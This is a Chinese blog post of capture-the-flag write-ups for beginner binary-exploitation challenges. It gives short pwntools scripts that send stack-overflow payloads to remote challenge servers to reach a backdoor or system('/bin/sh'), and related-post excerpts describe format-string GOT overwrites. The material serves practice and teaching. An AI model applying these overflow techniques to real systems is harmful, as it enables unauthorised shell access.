攻防世界 Pwn 新手

最新推荐文章于 2022-03-06 09:56:27 发布
原创 最新推荐文章于 2022-03-06 09:56:27 发布 · 4.2k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文档记录了作者在使用Python2.7过程中遇到的几种栈溢出技巧,包括get_shell、hello_pwn等简单案例,以及level3的复杂场景,涉及系统调用、字符串编码、整数溢出和format_string漏洞。重点讲解了如何处理不同环境下的地址长度和后门函数寻找策略。
该文章已生成可运行项目,

是一个总结与汇总,会把见到的思路,想法,wp都记录下来,并进行简单的分类

这里面的每个题我都没有去检查保护,太麻烦,新手区也没有需要绕过保护的,最简单的canary绕过也在进阶。
ps:我这里用的是python2.7。如果用python3的话代码会有一个致命的不同,看我的另外一篇博客

字符串编码解决python3 payload=‘a‘ +p64(1926)报错问题

01 get_shell

1、nc连接就行在这里插入图片描述2、简单的exp

from pwn import*
r=remote("220.249.52.133",35257)
r.interactive()

02 hello_pwn

在这里插入图片描述最最简单的栈溢出

from pwn import*
r=remote("220.249.52.133",30174)
payload='aaaa'+p32(1853186401)
r.sendlineafter("bof",payload)
r.interactive()

03 when_did_you_born在这里插入图片描述

栈溢出覆盖变量就行

from pwn import*
r=remote("220.249.52.133",56940)
r.sendlineafter("Birth?",'1234')
payload='aaaaaaaa'+p32(1926)
r.sendlineafter("Name?",payload) 
r.interactive()

04 level0

在这里插入图片描述简单的栈溢出,找一下后门函数 system

from pwn import*
r=remote("220.249.52.133",42821)
payload='a'*0x88+p64(0x400596) 
r.sendline(payload)
r.interactive()

这个倒是要注意 它程序里面是write函数的时候不用r.recv()

05 level2

在这里插入图片描述栈溢出 需要找一下system参数

from pwn import*
r=remote("220.249.52.133",52591)
payload='a'*0x88+'aaaa' + p32(0x8048320) + 'aaaa'+p32(0x804a024)
r.sendline(payload)
r.interactive()

但是发现个好玩的,如果将代码改成这样就会报错

<
本文章已经生成可运行项目
最低0.47元/天 解锁文章
攻防世界 pwn新手区 wp
Gtooler的博客
10-07 604
get-shell 此题是经典入门题,没有设置任何漏洞,直接给了shell 直接nc连上,然后ls,最后cat flag即可 hello_pwn 发现只要让dword_60106C == 1853186401就可以拿到flag read函数将把数据读入unk_601068中,要想办法让数据覆盖到dword_60106C,所以查看两个数据内存 计算距离为4,写个exp即可 from pwn import * p = remote('111.200.241.244', '56851') p.recvu
攻防世界pwn新手区整理
Lenard404的博客
08-19 3384
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
Sokoban_Game:推箱子游戏
06-27
推箱子_游戏 推箱子游戏 用Java语言开发来模拟推箱子游戏。 该项目包括在每个控制台用 Java 语言模拟推箱子游戏(仓库管理器),其中包括在平面上的特定点放置盒子,为此需要实现各种数据结构和分辨率算法,以提供完整和详细的游戏,能够验证用户确定的动作并符合游戏制定的规则。 以及提供使用 .XSB 格式的文件的可能性,这些文件代表能够在平台内播放的级别。 编程语言:Java。 开发环境:Netbeans。
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
Java-Sokoban-Game:Java推箱子游戏源代码-java source code
03-25
Java-Sokoban-Game Java推箱子游戏源代码 根据2条款BSD许可证
cpuadventure:Dragon CTF 2019预告片中的CPU冒险任务
03-09
这是Dragon CTF 2019 Teaser中的CPU Adventure任务。 任务是关于对CPU体系结构进行黑匣子逆向工程。 作为玩家,您将获得一个非常奇怪的处理器的二进制文件,并可以访问运行该二进制文件的服务器。 您必须通过对二进制文件进行统计分析来找出指令集,并借助与您可以与之交谈的服务器上正在运行的副本进行相关化。 如果要按预期方式解决此问题,请执行以下操作: $ make $ ./emu ./game.bin ./flag.txt 您可以玩游戏,也可以检查game.bin文件,但假装您无法读取emu文件。 要解决该任务,您必须在不使用“(C)HEAT”选项的情况下赢得比赛。 来自CTF的原始任务描述是: My grandfather used to design computers back in the 60s. While cleaning out his
[BJDCTF 2nd] r2t4
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 914
题目下载地址:点此下载 查保护 此处存在格式化字符串漏洞 利用格式化字符串漏洞复写got表中的__stack_chk_fail地址,这个函数的作用是,当程序出现栈溢出的时候执行此函数,利用格式化字符串漏洞把这个函数的got表地址覆盖为后门函数 EXP: from pwn import * context(arch='amd64',os='linux',word_size='64') #p...
CTF-Pwn-[BJDCTF 2nd]r2t4
归子莫的博客
05-06 1190
CTF-Pwn-[BJDCTF 2nd]r2t4 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]r2t4 下载题目的文件 r2t4 思路 使用file命令查看,发现是...
攻防世界pwn新手题wp(通俗易懂)
njh18790816639的博客
03-10 2248
get_shell 这道题先看看附件,探查一下信息,再用ida打开,就可以发现伪代码其实很简单的: 然后在远程连接这个端口进行攻击了。 并且我们能看到它的大致防护信息,然后来个脚本: 此时就可以进行攻击了。 这样子flag就拿到了。 CGfsb 刚开始先在windows里进行一番静态调试: 大概的知道了一些漏洞,和一点信息,我们就可以进行破解了。 ...
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7416
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
[BJDCTF 2nd]r2t4 [格式化字符串写GOT]
、moddemod
06-24 462
开启了Canary,但Canary失败的处理逻辑会进入到stack_chk_failed函数,stack_chk_failed函数是一个普通的延迟绑定函数,可以通过修改GOT表劫持这个函数。 exp from pwn import * context(log_level='debug') proc_name = './r2t4' p = process(proc_name) # p = remote('node3.buuoj.cn', 29985) elf = ELF(proc_name) __...
[BUUCTF]PWN——[BJDCTF 2nd]r2t4
mcmuyanga的博客
10-31 505
[BJDCTF 2nd]r2t4 附件 步骤 例行检查,64位,开启了canary和nx 64位ida载入,检索字符串的时候发现了后面函数,shell_addr=0x400626 main函数 可以溢出0x8字节,输出点存在格式化字符串漏洞 https://blog.youkuaiyun.com/weixin_44864859/article/details/105129673?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMac
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 683
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
PWN入门01[攻防世界]
qq_43746493的博客
03-06 481
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 题目链接: https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 环境:Kali+IDA Freeware7.6(之前在Ubuntu20上安装IDA6.4,F5无法查看伪代码) 参考博文: https://blog.youkuaiyun.com/qq_39596232/article/details/100036147
攻防世界 PWN新手练习区 hello_pwn
m0_54262894的博客
08-19 220
攻防世界 hello_pwn 先checksec一下,只开启了NX保护 放入IDA中查看一下伪C代码 发现程序很简单,只有两个puts函数,一个read函数和一个if语句 通过读程不难发现read函数是我们攻击的一个点,只要覆盖了read函数分配的空间就可以做我们想要做的事情 双击sub_400686板块,发现可以直接执行 cat flag.txt 命令 那么思路就更加清晰了 所以让dword_60106C==1853186401就可以执行...
Java pwn_CTF-Pwn-[BJDCTF 2nd]r2t4
weixin_30698721的博客
02-26 371
CTF-Pwn-[BJDCTF 2nd]r2t4博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd]r2t4下载题目的文件r2t4思路使用file命令查看,发现是64位的文件,使用ida64...
攻防世界-pwn-新手-get_shell
weixin_31610083的博客
10-12 1066
【题目描述】 运行就能拿到shell呢,真的 【附件】 一个文件 【过程及思路】 文件没有后缀。 直接丢到虚拟机(linux)里,改名为get_shell。 发现文件还没有执行权限,那就自己加上: Chmod +x get_shell 其中filename是附件的名字。 执行了出来是这个样子。 就这?? 确实拿到shell了,只不过是自己的shell…这个题目提示越来越皮了。 看了一下别人的WP,直接连给出的地址和端口就行。 Pwn代码: from pwn...
BJDCTF-PWN r2t4详解
weixin_44864859的博客
03-26 1203
BJDCTF_r2t4 考点:用格式化字符串写__stack_chk_fail 函数来 bypass canary 由于涉及到格式化字符串漏洞的利用,所以基本原理和利用方法要先有一定的了解。推荐先阅读CTF-wiki: 格式化字符串漏洞原理介绍 格式化字符串漏洞利用 1.首先检查程序的基础信息 64位程序,可以看到开启了NX和Stack防护 2.运行程序,对程序功能有基本了解 程序基本功能:对...
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1938
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
攻防世界pwn新手题答案
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考CTF-wiki上对格式化字符串的总结。另外,还可以利用栈溢出漏洞来实现攻击。栈溢出漏洞的原理是当输入的数据超过了栈的缓冲区大小时,会覆盖到相邻的内存区域,包括函数返回地址等重要信息。通过溢出覆盖system函数的参数为"/bin/sh",就可以获取到shell权限。在IDA32中,可以通过查看字符串窗口,找到可以直接利用的字符串,比如system和/bin/sh。这样就可以猜测需要溢出覆盖system函数的参数,实现获取shell的目的。123 #### 引用[.reference_title] - *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.youkuaiyun.com/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *3* [攻防世界 pwn 二进制漏洞简单题练习区 答题(1-10题解)](https://blog.youkuaiyun.com/qq_33957603/article/details/122450397)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值